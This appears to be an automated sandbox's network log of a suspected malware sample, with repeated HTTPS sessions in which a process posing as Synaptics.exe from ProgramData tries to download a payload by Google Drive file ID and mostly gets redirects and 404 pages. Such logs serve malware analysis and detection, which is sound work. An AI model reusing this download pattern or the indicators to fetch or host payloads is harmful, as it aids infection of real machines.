                                                                                              2025-01-02 19:29:24 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 47 45 55 49 67 44 4d 36 75 73 41 56 67 36 38 49 44 67 2d 34 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="xGEUIgDM6usAVg68IDg-4w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:24 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              124192.168.2.750150142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:24 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4z6xf3v4O9nOF38TImOYZ2V7kK8b1ngSojAxQbgCCglZPTrIKI4Hp8NTFFRKAaz0De
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:25 GMT
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-NtkrTJjYXmu21pxBvLHfhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 5a 31 75 76 76 55 76 71 4a 45 61 4c 7a 48 77 6e 63 6f 70 76 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="JZ1uvvUvqJEaLzHwncopvg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              125192.168.2.750149216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:24 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:25 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:25 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-NDcBSG59QdYedUplM03gPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              126192.168.2.750153216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:25 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:25 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:25 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-pKkHVf04bDFn-Mf9uc0Psg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              127192.168.2.750154142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:25 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:25 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7qDt-8NfckExTu2OL1mn18p5-xVdUlguKz_eKShpWmfj0a6D_EBRokRTT-xc5dXdW7Ksv6_bQ
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:25 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-hNrLQLGYCRR0tdftDRva2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:25 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:25 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 75 31 37 6f 76 4e 7a 4f 6f 5f 43 39 63 59 4e 47 68 52 45 53 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="Eu17ovNzOo_C9cYNGhRESQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:25 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              128192.168.2.750160216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:25 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              129192.168.2.750161142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:25 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              130192.168.2.750167216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:27 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:27 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--kLwAt3xTRv7eUckJSgdbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              131192.168.2.750168216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:27 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:26 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-S-qELf8u2HWT4UahjiptDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              132192.168.2.750178216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:27 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:28 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:28 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Lyw0uEmEfsrWaUZGcAJ4tg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              133192.168.2.750177142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:27 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:28 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC41PEfz3kO-Ybj1ovuu0Bz_LEaG0169eKf3hK_t0Bhqa3cZihpjvMlfCqOD6f2Alv3RSLNyzO4
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
